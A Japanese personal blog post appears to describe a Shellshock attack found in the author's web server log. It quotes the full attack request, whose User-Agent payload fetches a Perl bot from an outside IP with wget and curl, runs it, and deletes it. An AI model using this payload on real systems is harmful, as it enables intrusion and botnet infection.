世間で騒がれてる bash脆弱性「Shellshock」
詳しいことは分からないけどbashが基で動いてる Linux は多いから OpenSSL脆弱のときよりやばいらしい

Twitter とか見ていても案外周りの人も普通に突かれてて親切に User-Agent に脆弱あるよ!ここのサイト見た方がいい!っていうものだったり
おれもきててもそんなもんだろうと思ってました。

違った

 

SnapCrab_NoName_2014-9-29_9-45-29_No-00

 

[source]
"GET /cgi-bin/hi HTTP/1.0" 403 212 "-" "() {  :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm –rf /tmp/ji;rm -rf /tmp/ji*\x22" "-"
[/source]

Shellshockを使って、wget でプログラムをダウンロードして、curl -O で/jurat を /tmp/ji に保存して、プログラムを実行して
/tmp/ji* を削除

http://213.5.67.223/ji にアクセスしてみるとPerlで書かれたプログラム「LinuxNet perlbot」がありました。
調べてみるとPerlを使ってCPUを100%にさせて機能不能にさせるというものだった。
ということで、TOPコマンドしてみた。

 

SnapCrab_1912388216 - Poderosa_2014-9-29_10-7-42_No-00

やった!使用率100%になった!
とりあえず bashのアップデートしようと思いますが怖いですね。

http://213.5.67.223/jurat ここは存在してなかったので curl -O は実行出来ませんでした。

参考:http://d.hatena.ne.jp/Kango/20140928/1411939683
参考:https://forum.linode.com/viewtopic.php?t=8169